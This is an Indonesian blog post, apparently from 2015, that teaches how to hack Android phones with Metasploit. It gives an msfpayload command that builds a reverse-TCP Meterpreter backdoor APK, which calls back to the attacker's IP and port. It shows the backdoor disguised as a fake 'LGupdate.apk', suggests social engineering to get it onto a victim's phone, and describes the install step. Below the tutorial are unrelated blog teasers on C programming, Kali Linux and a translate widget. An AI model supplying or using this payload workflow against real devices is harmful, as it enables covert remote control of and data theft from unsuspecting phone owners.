TUTORIAL CARA BUAT PAYLOAD ATTACK ANDROID


1. Buat dulu payloadnya (backdoor) dengan perintah seperti berikut di bawah

msfpayload android/meterpreter/reverse_tcp lhost=nomorIP lport=nomorPort R > namaaplikasi.apk

 

2. Transfer file backdoornya ke target. Setelah perintah di atas dijalankan, maka pada kasus saya akan tercipta file apk dengan nama LGupdate.apk Selanjutnya tinggal bagaimana file tersebut bisa sampai ke smartphone android victim. (you could always try soceng). 

 

Learning Pentesting 4: Hacking Android dengan Metasploit

  by LUTHFI

Android. Seperti layaknya Operating System lainnya, juga bisa dieksploitasi (baca: di-hack).

Tidak ada yang spesial dari tulisan kali ini, sekedar mengisi waktu luang di sela “clinic time”, sekaligus melunasi permintaan dari beberapa teman untuk hacking  dengan target android.

Lab yang dibuat untuk percobaan kali ini sebagai berikut:

1. Attacker: Kali Linux 1.09a Persistence USB dijalankan pada netbook Asus eeePC seashell 1015PX

2. Victim: Android JellyBean (Sony Xperia M dual), Android KitKat (LG G3)

3. ISP: telkomsel flash ultima. Dibagi dengan android wifi tethering (LG G3)

4. Metasploit framework: Exploit: exploit/multi/handler; payload: android/meterpreter/reverse_tcp

Langkah:

1. Buat dulu payloadnya (backdoor) dengan perintah seperti berikut di bawah

msfpayload android/meterpreter/reverse_tcp lhost=nomorIP lport=nomorPort R > namaaplikasi.apk

Screenshot from 2015-07-27 09:55:06

Screenshot from 2015-07-27 09:57:15

LGupdate.apk sebelum ditransfer

2. Transfer file backdoornya ke target. Setelah perintah di atas dijalankan, maka pada kasus saya akan tercipta file apk dengan nama LGupdate.apk Selanjutnya tinggal bagaimana file tersebut bisa sampai ke smartphone android victim. (you could always try soceng).

Screenshot_2015-07-27-11-41-34

LGupdate.apk di HP victim

3. Install file apk di smartphone victim. File apk yang diinstall akan berubah nama menjadi MainActivity. Saat di-tap maka penampakan yang muncul di smartphone target kurang lebihnya seperti berikut:

Screenshot_2015-07-27-11-41-47

Komentar

Posting Komentar

Postingan populer dari blog ini

Belajar Pemrograman C #3: Struktur Dasar dan Aturan Penulisan Program C yang Harus dipahami dengan mudah

Gambar
  BY LUTHFI@HEXY Belajar Pemrograman C #3: Struktur Dasar dan Aturan Penulisan Program C yang Harus dipahami # C Kita sudah belajar membuat program C pertama , yaitu program Hello World! Selanjutnya kita akan belajar tentang stuktur kode program pada bahasa C. Bagaimana bentuk stuktur dasar program C? Mari kita perhatikan program C berikut ini: #include <stdio.h> int main (){ printf( "Hello World!" ); return 0 ; } Ini adalah struktur dasar Jika kamu baru pertama kali melihat program ini, barangkali akan menyanyakan banyak hal. Seperti: Apa itu #include <stdio.h> ? Apa itu int ? Apa itu main ? apa itu printf ? dll. Struktur Dasar Program C Setiap kita ingin membuat program C, kita harus menuliskan struktur seperti berikut ini: #include <stdio.h> int main (){ // kode atau logika program kita di sini return 0 ; } Ini adalah struktur dasar yang wajib dipahami. Kalau kita perhatikan, struktur program tersebut dibagi menjadi dua bagian ut...
Baca selengkapnya

CARA BELAJAR KALI LINUX | Lengkap Untuk Pemula

Gambar
  CARA BELAJAR KALI LINUX | Lengkap Untuk Pemula Arianto 23 April 2020 Kali linux sangat populer di kalangan pencita IT mulai dari hacker profesional sampai bocah yang cuma bisa pakai tool orang lain dan sok sokan jadi hacker (script kiddie). Banyak yang belum tau apa itu kali linux namun ingin mencoba belajar dengan harapan akan menjadi hacker secara instan dalam waktu yang singkat (nice dream). Disini kamu akan belajar pemahaman yang benar tentang kali linux, cara install kali linux dan tehnik atau tahapan hacking menggunakan kali linux. Apa itu Kali Linux? Kali linux adalah distro linux yang dikembangkan oleh "Offensive Security" berdasarkan linux berbasis debian yang didesain untuk framework digital forensics ,penetration testing dan audit kemanan jaringan. Di dalam kali linux sudah tersedia berbagai macam tools guna melakukan penetration testing (pentesting) ke infrastruktur IT yang akan diaudit. Dulu Bernama Backtrack Kali Linux didevelop oleh Mati Aharon...
Baca selengkapnya

Cara Membuat Translate Web Menggunakan HTML dan JavaScript

Gambar
 Buat File index.html / index.php dan masukan script berikut : <!DOCTYPE html> <html> <head> <title>Cara Membuat Translate Pada Web - Denny ID</title> </head> <style type="text/css"> #goog-gt-tt { display:none !important; } .goog-te-banner-frame { display:none !important; } .goog-te-menu-value:hover { text-decoration:none !important; } body { top:0 !important; } #google_translate_element2 { display:none!important; } .lg{ width: 125px; height: 25px; margin-top: 5px; } </style> <body> <br> <select onchange="doGTranslate(this);" class="lg">         <option>Select Language</option>            <option value="id|en" ></i> English</option>         <option value="id|id" >Indonesia</option>     </select> ...
Baca selengkapnya